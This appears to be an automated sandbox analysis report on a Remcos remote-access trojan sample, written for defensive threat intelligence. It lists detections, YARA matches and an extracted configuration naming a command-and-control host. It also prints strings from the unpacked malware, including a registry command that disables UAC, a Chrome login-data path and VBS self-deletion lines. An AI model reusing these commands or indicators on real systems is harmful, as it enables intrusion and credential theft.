Windows Analysis Report
file.exe

Overview

General Information

Sample Name: file.exe
Analysis ID: 882711
MD5: 66108176e22e6f9513a62c76f2185468
SHA1: a05e217104b39485fbb4ce3cda9cb65b20960ccb
SHA256: e1eb3fe18ad660415f59eaac2c768afa1b20e07f107dfc207da8b0880a888aaf
Tags: NET, exe, MSIL, RemcosRAT, x64

Detection

Remcos
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Yara detected UAC Bypass using CMSTP
Contains functionality to bypass UAC (CMSTPLUA)
Multi AV Scanner detection for submitted file
Malicious sample detected (through community Yara rule)
Yara detected Remcos RAT
Sigma detected: Remcos
Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Multi AV Scanner detection for domain / URL
Writes to foreign memory regions
Contains functionality to steal Firefox passwords or cookies
Delayed program exit found
Machine Learning detection for sample
Allocates memory in foreign processes
Contains functionality to modify clipboard data
.NET source code contains potential unpacker
Injects a PE file into a foreign processes
Contains functionality to steal Chrome passwords or cookies
C2 URLs / IPs found in malware configuration
Uses dynamic DNS services
Queries the volume information (name, serial number etc) of a device
Yara signature match
Contains functionality to enumerate process and check for explorer.exe or svchost.exe (often used for thread injection)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to query locales information (e.g. system language)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Contains functionality to query CPU information (cpuid)
Found potential string decryption / allocating functions
Contains functionality to launch a control a shell (cmd.exe)
Contains functionality to enumerate running services
Contains functionality to dynamically determine API calls
Contains functionality to read the clipboard data
Contains functionality which may be used to detect a debugger (GetProcessHeap)
IP address seen in connection with other malware
Contains long sleeps (>= 3 min)
PE file does not import any functions
Sample file is different than original file name gathered from version info
Extensive use of GetProcAddress (often used to hide API calls)
Contains functionality to read the PEB
Contains functionality to download and launch executables
Contains functionality to retrieve information about pressed keystrokes
Found large amount of non-executed APIs
Uses Microsoft's Enhanced Cryptographic Provider
Creates a process in suspended mode (likely to inject code)
Contains functionality to simulate mouse events
Contains functionality for read data from the clipboard

Classification

  • System is w10x64
  • file.exe (PID: 6804 cmdline: C:\Users\user\Desktop\file.exe MD5: 66108176E22E6F9513A62C76F2185468)
    • aspnet_compiler.exe (PID: 6588 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe MD5: 17CC69238395DF61AAF483BCEF02E7C9)
  • cleanup
Name: Remcos, RemcosRAT
Description: Remcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers. Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns. Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user. Remcos is developed by the cybersecurity company BreakingSecurity.
Attribution:
  • APT33
  • The Gorgon Group
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos
{"Host:Port:Password": "pekonomia.duckdns.org:30861:1", "Assigned name": "RemoteHost", "Copy file": "remcos.exe", "Startup value": "Remcos", "Mutex": "Rmc-B0VP4N", "Keylog file": "logs.dat", "Screenshot file": "Screenshots", "Audio folder": "MicRecords", "Copy folder": "Remcos", "Keylog folder": "remcos", "Keylog file max size": "100000"}
Source | Rule | Description | Author | Strings
00000001.00000002.550296982.0000018F9283E000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_UACBypassusingCMSTP | Yara detected UAC Bypass using CMSTP | Joe Security |
00000001.00000002.550296982.0000018F9283E000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security |
00000001.00000002.550296982.0000018F9283E000.00000004.00000800.00020000.00000000.sdmp | Windows_Trojan_Remcos_b296e965 | unknown | unknown |
  • 0x6ed58:$a1: Remcos restarted by watchdog!
  • 0x6f2bc:$a3: %02i:%02i:%02i:%03i
00000002.00000002.813061315.00000000013F7000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security |
00000002.00000002.812919702.0000000000400000.00000040.00000400.00020000.00000000.sdmp | JoeSecurity_UACBypassusingCMSTP | Yara detected UAC Bypass using CMSTP | Joe Security |
Source | Rule | Description | Author | Strings
1.2.file.exe.18f92636a68.1.unpack | JoeSecurity_UACBypassusingCMSTP | Yara detected UAC Bypass using CMSTP | Joe Security |
1.2.file.exe.18f92636a68.1.unpack | JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security |
1.2.file.exe.18f92636a68.1.unpack | INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM | Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) | ditekSHen |
  • 0x623b8:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7}
  • 0x6234c:$s1: CoGetObject
  • 0x62360:$s1: CoGetObject
  • 0x6237c:$s1: CoGetObject
  • 0x6c15e:$s1: CoGetObject
  • 0x6230c:$s2: Elevation:Administrator!new:
1.2.file.exe.18f92636a68.1.unpack | Windows_Trojan_Remcos_b296e965 | unknown | unknown |
  • 0x68470:$a1: Remcos restarted by watchdog!
  • 0x689d4:$a3: %02i:%02i:%02i:%03i
1.2.file.exe.18f92636a68.1.unpack | REMCOS_RAT_variants | unknown | unknown |
  • 0x624c4:$str_a1: C:\Windows\System32\cmd.exe
  • 0x62440:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
  • 0x62440:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
  • 0x62938:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data
  • 0x63168:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)
  • 0x62534:$str_b2: Executing file:
  • 0x635b4:$str_b3: GetDirectListeningPort
  • 0x62f58:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject")
  • 0x630d8:$str_b7: \update.vbs
  • 0x6255c:$str_b9: Downloaded file:
  • 0x62548:$str_b10: Downloading file:
  • 0x625ec:$str_b12: Failed to upload file:
  • 0x6357c:$str_b13: StartForward
  • 0x6359c:$str_b14: StopForward
  • 0x63030:$str_b15: fso.DeleteFile "
  • 0x62fc4:$str_b16: On Error Resume Next
  • 0x63060:$str_b17: fso.DeleteFolder "
  • 0x625dc:$str_b18: Uploaded file:
  • 0x6259c:$str_b19: Unable to delete:
  • 0x62ff8:$str_b20: while fso.FileExists("
  • 0x62a71:$str_c0: [Firefox StoredLogins not found]

              Stealing of Sensitive Information

              Source: Registry Key setAuthor: Joe Security: Data: Details: C5 5F 2B 55 33 A4 98 37 6E 69 93 D0 FA C8 DF 1D 85 5A D2 A3 F4 69 F6 E6 9F 19 FD F0 A7 EC 01 F5 46 63 8F BB B9 69 85 00 DF F9 DF 1C 35 87 19 0C 66 74 E5 C1 40 C8 B2 56 52 3A 39 AF 6E 7B A2 4B C2 F9 6C 0B 27 18 35 EF DA 6D 77 A7 1C D9 6A C4 7E 5E C3 0D 05 AF AE 03 2A 5D 9D 85 53 DA 1C 55 9B 15 A7 B6 55 99 F2 C6 6A EF 6C 66 0F F0 CB 98 42 F9 5B 20 60 89 F5 83 86 03 C5 66 7C 2A FB E5 39 FA 4B 6E , EventID: 13, EventType: SetValue, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe, ProcessId: 6588, TargetObject: HKEY_CURRENT_USER\Software\Rmc-B0VP4N\exepath
              No Snort rule has matched

              AV Detection

Source: 00000002.00000002.813061315.00000000013F7000.00000004.00000020.00020000.00000000.sdmp, Malware Configuration Extractor: Remcos {"Host:Port:Password": "pekonomia.duckdns.org:30861:1", "Assigned name": "RemoteHost", "Copy file": "remcos.exe", "Startup value": "Remcos", "Mutex": "Rmc-B0VP4N", "Keylog file": "logs.dat", "Screenshot file": "Screenshots", "Audio folder": "MicRecords", "Copy folder": "Remcos", "Keylog folder": "remcos", "Keylog file max size": "100000"}
Source: file.exe, ReversingLabs: Detection: 24%
Source: file.exe, Virustotal: Detection: 32%
Source: Yara match, File source: 1.2.file.exe.18f92636a68.1.unpack, type: UNPACKEDPE
Source: Yara match, File source: 2.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match, File source: 2.2.aspnet_compiler.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match, File source: 1.2.file.exe.18f92636a68.1.raw.unpack, type: UNPACKEDPE
Source: Yara match, File source: 00000001.00000002.550296982.0000018F9283E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 00000002.00000002.813061315.00000000013F7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 00000002.00000002.812919702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 00000001.00000002.550296982.0000018F91E43000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: Process Memory Space: file.exe PID: 6804, type: MEMORYSTR
Source: Yara match, File source: Process Memory Space: aspnet_compiler.exe PID: 6588, type: MEMORYSTR
Source: file.exe, Avira: detected
Source: pekonomia.duckdns.org, Avira URL Cloud: Label: malware
Source: pekonomia.duckdns.org, Virustotal: Detection: 6%
Source: file.exe, Joe Sandbox ML: detected
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe, Code function: 2_2_00432142 CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,2_2_00432142
Source: file.exe, 00000001.00000002.550296982.0000018F9283E000.00000004.00000800.00020000.00000000.sdmp, Binary or memory string: -----BEGIN PUBLIC KEY-----

              Exploits

Source: Yara match, File source: 1.2.file.exe.18f92636a68.1.unpack, type: UNPACKEDPE
Source: Yara match, File source: 2.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match, File source: 2.2.aspnet_compiler.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match, File source: 1.2.file.exe.18f92636a68.1.raw.unpack, type: UNPACKEDPE
Source: Yara match, File source: 00000001.00000002.550296982.0000018F9283E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 00000002.00000002.812919702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 00000001.00000002.550296982.0000018F91E43000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: Process Memory Space: file.exe PID: 6804, type: MEMORYSTR
Source: Yara match, File source: Process Memory Space: aspnet_compiler.exe PID: 6588, type: MEMORYSTR

              Privilege Escalation

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe, Code function: 2_2_00406B71 _wcslen,CoGetObject,2_2_00406B71
Source: file.exe, Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: CEMENT.pdb source: file.exe, 00000001.00000002.555430907.0000018FF8E60000.00000004.08000000.00040000.00000000.sdmp, file.exe, 00000001.00000002.550087026.0000018F8008D000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: NBB872.pdb source: file.exe
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe, Code function: 2_2_0044D0F9 FindFirstFileExA,2_2_0044D0F9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe, Code function: 2_2_0040B0AA FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,2_2_0040B0AA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe, Code function: 2_2_0040B2B1 FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,2_2_0040B2B1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe, Code function: 2_2_00418650 FindFirstFileW,FindNextFileW,FindNextFileW,2_2_00418650
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe, Code function: 2_2_0040B8C7 FindFirstFileW,PathFileExistsW,FindNextFileW,FindClose,FindClose,2_2_0040B8C7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe, Code function: 2_2_00408909 __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose,2_2_00408909
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe, Code function: 2_2_0041AC0A FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose,2_2_0041AC0A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe, Code function: 2_2_00408D1B __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,2_2_00408D1B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe, Code function: 2_2_00407E80 __EH_prolog,FindFirstFileW,__CxxThrowException@8,FindNextFileW,FindClose,2_2_00407E80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe, Code function: 2_2_00406EB0 FindFirstFileW,FindNextFileW,2_2_00406EB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe, Code function: 2_2_0040730B SetEvent,GetFileAttributesW,DeleteFileW,ShellExecuteW,GetLogicalDriveStringsA,SetFileAttributesW,DeleteFileA,Sleep,StrToIntA,CreateDirectoryW,2_2_0040730B

              Networking

Source: Malware configuration extractor, URLs: pekonomia.duckdns.org
Source: unknown, DNS query: name: pekonomia.duckdns.org
Source: Joe Sandbox View, ASN Name: WOWUS WOWUS
Source: Joe Sandbox View, IP Address: 192.169.69.26 192.169.69.26
Source: aspnet_compiler.exe, String found in binary or memory: http://geoplugin.net/json.gp
Source: file.exe, 00000001.00000002.550296982.0000018F9283E000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000002.00000002.812919702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, String found in binary or memory: http://geoplugin.net/json.gp/C
Source: unknown, DNS traffic detected: queries for: pekonomia.duckdns.org
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe, Code function: 2_2_004255BC recv,2_2_004255BC

              Key, Mouse, Clipboard, Microphone and Screen Capturing

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe, Code function: 2_2_00415802 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,CloseClipboard,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,2_2_00415802
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe, Code function: 2_2_004099E3 GetForegroundWindow,GetWindowThreadProcessId,GetKeyboardLayout,GetKeyState,GetKeyboardState,ToUnicodeEx,2_2_004099E3

              E-Banking Fraud

Source: Yara match, File source: 1.2.file.exe.18f92636a68.1.unpack, type: UNPACKEDPE
Source: Yara match, File source: 2.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match, File source: 2.2.aspnet_compiler.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match, File source: 1.2.file.exe.18f92636a68.1.raw.unpack, type: UNPACKEDPE
Source: Yara match, File source: 00000001.00000002.550296982.0000018F9283E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 00000002.00000002.813061315.00000000013F7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 00000002.00000002.812919702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 00000001.00000002.550296982.0000018F91E43000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: Process Memory Space: file.exe PID: 6804, type: MEMORYSTR
Source: Yara match, File source: Process Memory Space: aspnet_compiler.exe PID: 6588, type: MEMORYSTR

              System Summary

Source: 1.2.file.exe.18f92636a68.1.unpack, type: UNPACKEDPE, Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 1.2.file.exe.18f92636a68.1.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 1.2.file.exe.18f92636a68.1.unpack, type: UNPACKEDPE, Matched rule: REMCOS_RAT_variants Author: unknown
Source: 2.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPE, Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 2.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 2.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPE, Matched rule: REMCOS_RAT_variants Author: unknown
Source: 2.2.aspnet_compiler.exe.400000.0.raw.unpack, type: UNPACKEDPE, Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 2.2.aspnet_compiler.exe.400000.0.raw.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 2.2.aspnet_compiler.exe.400000.0.raw.unpack, type: UNPACKEDPE, Matched rule: REMCOS_RAT_variants Author: unknown
Source: 1.2.file.exe.18f92636a68.1.raw.unpack, type: UNPACKEDPE, Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 1.2.file.exe.18f92636a68.1.raw.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 00000001.00000002.550296982.0000018F9283E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 00000002.00000002.812919702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY, Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 00000002.00000002.812919702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 00000002.00000002.812919702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY, Matched rule: REMCOS_RAT_variants Author: unknown
Source: 00000001.00000002.550296982.0000018F91E43000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: Process Memory Space: file.exe PID: 6804, type: MEMORYSTR, Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: Process Memory Space: aspnet_compiler.exe PID: 6588, type: MEMORYSTR, Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 1.2.file.exe.18f92636a68.1.unpack, type: UNPACKEDPE, Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 1.2.file.exe.18f92636a68.1.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 1.2.file.exe.18f92636a68.1.unpack, type: UNPACKEDPE, Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 2.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPE, Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 2.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 2.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPE, Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 2.2.aspnet_compiler.exe.400000.0.raw.unpack, type: UNPACKEDPE, Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 2.2.aspnet_compiler.exe.400000.0.raw.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 2.2.aspnet_compiler.exe.400000.0.raw.unpack, type: UNPACKEDPE, Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 1.2.file.exe.18f92636a68.1.raw.unpack, type: UNPACKEDPE, Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 1.2.file.exe.18f92636a68.1.raw.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 00000001.00000002.550296982.0000018F9283E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 00000002.00000002.812919702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY, Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 00000002.00000002.812919702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 00000002.00000002.812919702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY, Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 00000001.00000002.550296982.0000018F91E43000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: Process Memory Space: file.exe PID: 6804, type: MEMORYSTR, Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: Process Memory Space: aspnet_compiler.exe PID: 6588, type: MEMORYSTR, Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: String function: 0043307B appears 41 times
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: String function: 00402073 appears 50 times
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: String function: 00433700 appears 54 times
              Source: file.exeStatic PE information: No import functions for PE file found
              Source: file.exeBinary or memory string: OriginalFilename vs file.exe
              Source: file.exe, 00000001.00000002.554923464.0000018FF8B19000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs file.exe
              Source: file.exe, 00000001.00000002.555430907.0000018FF8E60000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameCEMENT.dll. vs file.exe
              Source: file.exe, 00000001.00000002.550087026.0000018F8008D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCEMENT.dll. vs file.exe
              Source: file.exeBinary or memory string: OriginalFilenameNBB872.exe. vs file.exe
              Source: file.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
              Source: file.exeReversingLabs: Detection: 24%
              Source: file.exeVirustotal: Detection: 32%
              Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
              Source: unknownProcess created: C:\Users\user\Desktop\file.exe C:\Users\user\Desktop\file.exe
              Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
              Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 2_2_00416840 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,2_2_00416840
              Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\file.exe.logJump to behavior
